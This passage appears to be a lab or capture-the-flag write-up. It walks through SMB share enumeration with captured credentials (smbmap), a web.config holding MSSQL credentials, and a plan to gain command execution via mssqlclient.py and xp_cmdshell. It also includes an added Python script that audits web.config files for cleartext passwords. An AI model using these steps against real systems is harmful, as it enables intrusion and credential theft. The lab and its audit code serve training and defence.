Credentials obtained

We have the username and password for a new user.

So now it is time for more enumeration. The question says: 'Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?'

That means we have to enumerate file shares and the files inside them. Let's use smbmap first to list the shares and their permissions:

smbmap -u BR086 -p Welcome1 -H 172.16.7.3
[+] IP: 172.16.7.3:445  Name: inlanefreight.local                               
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Department Shares                                       READ ONLY       Share for department users
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

Let's look inside the Department Shares share first, recursing through it with -R:

smbmap -u BR086 -p Welcome1 -H 172.16.7.3 -R "Department Shares"
[+] IP: 172.16.7.3:445  Name: inlanefreight.local                               
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Department Shares                                       READ ONLY
        .\Department Shares\*
        dr--r--r--                0 Fri Apr  1 11:04:17 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:17 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    Accounting
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    Executives
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    Finance
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    HR
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    IT
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    Marketing
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    R&D
        .\Department Shares\Accounting\*
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:17 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:54 2022    Public
        .\Department Shares\Executives\*
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:15 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:49 2022    Public
        .\Department Shares\Finance\*
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:12 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:43 2022    Public
        .\Department Shares\HR\*
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:04 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:27 2022    Public
        .\Department Shares\IT\*
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:22 2022    Public
        .\Department Shares\IT\Private\*
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    Development
        .\Department Shares\IT\Private\Development\*
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    ..
        fr--r--r--             1203 Fri Apr  1 11:05:02 2022    web.config
        .\Department Shares\Marketing\*
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:10 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:38 2022    Public
        .\Department Shares\R&D\*
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:07 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:33 2022    Public

We found a web.config file under IT\Private\Development. Let's download it with smbmap's -A option, which downloads files whose names match a given pattern.

Once we open the file, we find both the username and password for the SQL database in its connection string. Let's use mssqlclient.py to authenticate with them.
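The file we are after is a standard ASP.NET web.config, where database credentials live in the connectionStrings section. The following is an added example, not part of the original write-up or the lab: it parses a constructed web.config (the real file's contents are not reproduced here) and flags every MSSQL connection string that embeds a cleartext password instead of using integrated Windows authentication, which is the check an auditor would run across a share to find exactly this kind of leak.

```python
# Added example: audit a web.config for MSSQL connection strings that
# carry a cleartext password. The sample config below is constructed;
# the host, user and password values are placeholders.
import xml.etree.ElementTree as ET

SAMPLE_WEB_CONFIG = """
<configuration>
  <connectionStrings>
    <add name="DevDb"
         connectionString="Server=SQL01;Database=DevApp;User ID=svc_dev;Password=EXAMPLE_PLACEHOLDER;"
         providerName="System.Data.SqlClient" />
    <add name="ProdDb"
         connectionString="Server=SQL01;Database=Prod;Integrated Security=SSPI;"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>
"""

def parse_connection_string(cs: str) -> dict:
    """Split 'Key=Value;Key=Value' into a dict. Keys are lower-cased and
    common aliases are folded together so 'uid'/'User ID' and
    'pwd'/'Password' are treated as the same field."""
    aliases = {"uid": "user id", "user": "user id", "pwd": "password",
               "data source": "server", "initial catalog": "database"}
    fields = {}
    for part in cs.split(";"):
        if "=" not in part:
            continue
        key, _, value = part.partition("=")
        key = key.strip().lower()
        fields[aliases.get(key, key)] = value.strip()
    return fields

def find_cleartext_db_credentials(config_xml: str) -> list:
    """Return (name, user, password) for each <add> element whose
    connectionString embeds a password. Entries using integrated
    security carry no password field and are not reported."""
    root = ET.fromstring(config_xml)
    findings = []
    for add in root.iter("add"):
        cs = add.get("connectionString")
        if not cs:
            continue  # appSettings-style <add key=.../> entries are skipped
        fields = parse_connection_string(cs)
        if "password" in fields:
            findings.append((add.get("name"), fields.get("user id"), fields["password"]))
    return findings

if __name__ == "__main__":
    for name, user, _pw in find_cleartext_db_credentials(SAMPLE_WEB_CONFIG):
        print(f"[!] {name}: user={user} has a cleartext password in web.config")
```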

AD Lateral Movement

Once we are in, we can run OS commands: first type enable_xp_cmdshell, then issue commands in the format xp_cmdshell whoami /priv.
